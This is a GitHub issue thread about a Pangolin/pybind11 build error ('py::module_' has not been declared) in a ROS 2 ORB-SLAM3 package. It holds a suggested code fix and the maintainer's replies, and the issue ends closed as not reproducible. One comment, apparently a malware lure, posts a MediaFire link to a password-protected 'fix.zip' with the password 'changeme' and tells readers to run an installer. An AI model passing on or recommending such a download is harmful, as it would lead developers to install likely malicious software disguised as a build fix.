Mechazo11/ros2_orb_slam3 #17: /Pangolin/components/pango_python/src/pyinterpreter.cpp:63:27: error: ‘py::module_’ has not been declared

learntolear, 2024-08-27:
/Pangolin/components/pango_python/src/pyinterpreter.cpp:63:27: error: ‘py::module_’ has not been declared

The reason for this error is the version problem of  pybind11 related in https://pybind11.readthedocs.io/en/stable/upgrade.html.

So change the py::module_ to py::module at the line 61 and 63 could fix the problem.

yiweifengyan, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Mechazo11, 2024-08-27:
Hi @learntolear thank you for reporting this bug. Is this bug present in the latest build of Pangolin?

learntolear, 2024-08-27:
Yes. And I think the problem is related to the version of the pybind11 you have installed in your local machinal.

Mechazo11, 2024-09-03:
Hi @learntolear. Were you able to test building the package in Ubuntu 24.04 with ROS 2 Jazzy?

Mechazo11, 2024-09-03:
@learntolear could you elaborate on the solution a bit more. My three ubuntu 22.04 machines, i haven't seen this problem in any one of them. Maybe with some details, I may be able to replicate this issue and open a PR to solve this problem

Mechazo11, 2024-09-12:
@learntolear closing this issue for the time being as no other users have reported this error and I was not able to reproduce this in my end. Please feel free to opening it if the issue persists.

closed 2024-09-12 by Mechazo11